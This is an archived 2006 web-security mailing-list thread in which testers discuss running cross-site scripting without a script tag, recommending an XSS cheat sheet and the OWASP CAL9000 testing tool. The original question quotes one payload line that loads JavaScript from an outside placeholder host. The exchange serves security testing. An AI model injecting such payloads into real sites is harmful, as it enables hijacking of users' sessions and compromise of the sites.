WebApp Sec mailing list archives
RE: XSS - how to run script
From: "Joshua Perrymon" <josh.perrymon () purehacking com>
Date: Fri, 20 Oct 2006 09:09:46 +1000
One of the best repositories of exotic ways to perform XSS (with or without evasion, with or without script tag) is the XSS cheat sheet: http://ha.ckers.org/xss.html
I agree 100%. I would look at the Cal9000 tool on the OWASP website.
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project

It uses RSnake's XSS library and includes it in a Website/Tool/Scratchpad to use during these APP tests. I put Cal9000 on the first version of the OWASP Live CD but it won't be released for another month. If you use it just make sure your browser is Firefox... It doesn't like Opera or others.

Cheers,
JP

Joshua Perrymon, CE|H,OPST,OPSA
Sr. Security Consultant
-----------------------------------------
Pure Hacking - The Leaders In Internet Security
-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of A. R.
Sent: Friday, 20 October 2006 6:23 AM
Cc: Penetration Testing; Web Application Security
Subject: Re: XSS - how to run script

One of the best repositories of exotic ways to perform XSS (with or without evasion, with or without script tag) is the XSS cheat sheet: http://ha.ckers.org/xss.html

hth
--
icesurfer

Tal Argoni wrote:
Does anyone have any techniques/knowledge/examples/ideas/etc of how it is possible to run script without using the <script> tag, and without evasion techniques?

<script src=http://www.www.com/XSS.js></script>

Thanks a lot
LegendaryZion